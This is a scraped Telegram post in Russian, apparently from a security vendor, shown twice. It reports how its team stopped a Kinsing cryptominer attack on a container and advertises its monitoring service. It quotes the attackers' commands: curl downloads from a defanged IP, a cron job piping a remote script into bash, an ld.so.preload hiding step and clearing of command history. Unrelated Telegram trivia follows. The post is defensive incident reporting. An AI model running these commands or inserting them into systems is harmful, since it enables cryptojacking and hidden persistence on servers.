Telegram Group & Telegram Channel
🥑 Атака майнера: защита контейнерной среды на практике

Чем популярнее становятся контейнеры, тем больше появляется угроз, связанных с уязвимостями этих сред.

Рассказываем, как мы остановили атаку кластера активности Resourceful Wolf. Она началась с эксплуатации уязвимости публичного веб-приложения, запущенного в контейнере.

Что сделали злоумышленники:

1. Загрузили с внешнего ресурса ПО для майнинга Kinsing:


curl -o /tmp/libsystem.so http://95.142.47[.]27/libsystem.so ; curl -o /tmp/kinsing http://95.142.47[.]27/kinsing


Kinsing — вредоносное ПО на основе Golang, которое используется для добычи криптовалюты на взломанном сервере. Обычно злоумышленники устанавливают этот майнер в контейнере, поэтому для защиты от подобного ВПО важно иметь под рукой решения или сервисы, позволяющие видеть происходящее в таких средах.

2. Закрепились через задачу Cron:

* * * * * curl http://95.142.47[.]27/kinsing | bash > /dev/null 2>&1


3. Попробовали скрыть вредоносную активность в системе — добавили в /etc/ld.so.preload вредоносную библиотеку /tmp/libsystem.so.

4. Удалили историю вводимых команд.

Команда BI.ZONE TDR остановила атаку. Мы изолировали скомпрометированный хост, проанализировали контейнер и предотвратили вредоносную активность.

BI.ZONE EDR в составе сервиса BI.ZONE TDR позволяет вести мониторинг событий в контейнерах, при необходимости обеспечивая активное реагирование на хостах. В результате удается защитить контейнерные среды от ВПО вроде майнера Kinsing.

Напишите нам, и мы проведем бесплатное пилотирование.
Please open Telegram to view this post
VIEW IN TELEGRAM



group-telegram.com/bizone_channel/1401
Create:
Last Update:

🥑 Атака майнера: защита контейнерной среды на практике

Чем популярнее становятся контейнеры, тем больше появляется угроз, связанных с уязвимостями этих сред.

Рассказываем, как мы остановили атаку кластера активности Resourceful Wolf. Она началась с эксплуатации уязвимости публичного веб-приложения, запущенного в контейнере.

Что сделали злоумышленники:

1. Загрузили с внешнего ресурса ПО для майнинга Kinsing:


curl -o /tmp/libsystem.so http://95.142.47[.]27/libsystem.so ; curl -o /tmp/kinsing http://95.142.47[.]27/kinsing


Kinsing — вредоносное ПО на основе Golang, которое используется для добычи криптовалюты на взломанном сервере. Обычно злоумышленники устанавливают этот майнер в контейнере, поэтому для защиты от подобного ВПО важно иметь под рукой решения или сервисы, позволяющие видеть происходящее в таких средах.

2. Закрепились через задачу Cron:

* * * * * curl http://95.142.47[.]27/kinsing | bash > /dev/null 2>&1


3. Попробовали скрыть вредоносную активность в системе — добавили в /etc/ld.so.preload вредоносную библиотеку /tmp/libsystem.so.

4. Удалили историю вводимых команд.

Команда BI.ZONE TDR остановила атаку. Мы изолировали скомпрометированный хост, проанализировали контейнер и предотвратили вредоносную активность.

BI.ZONE EDR в составе сервиса BI.ZONE TDR позволяет вести мониторинг событий в контейнерах, при необходимости обеспечивая активное реагирование на хостах. В результате удается защитить контейнерные среды от ВПО вроде майнера Kinsing.

Напишите нам, и мы проведем бесплатное пилотирование.

BY BI.ZONE




Share with your friend now:
group-telegram.com/bizone_channel/1401

View MORE
Open in Telegram


Telegram | DID YOU KNOW?

Date: |

The gold standard of encryption, known as end-to-end encryption, where only the sender and person who receives the message are able to see it, is available on Telegram only when the Secret Chat function is enabled. Voice and video calls are also completely encrypted. Again, in contrast to Facebook, Google and Twitter, Telegram's founder Pavel Durov runs his company in relative secrecy from Dubai. Update March 8, 2022: EFF has clarified that Channels and Groups are not fully encrypted, end-to-end, updated our post to link to Telegram’s FAQ for Cloud and Secret chats, updated to clarify that auto-delete is available for group and channel admins, and added some additional links. Continuing its crackdown against entities allegedly involved in a front-running scam using messaging app Telegram, Sebi on Thursday carried out search and seizure operations at the premises of eight entities in multiple locations across the country. In this regard, Sebi collaborated with the Telecom Regulatory Authority of India (TRAI) to reduce the vulnerability of the securities market to manipulation through misuse of mass communication medium like bulk SMS.
from ar


Telegram BI.ZONE
FROM American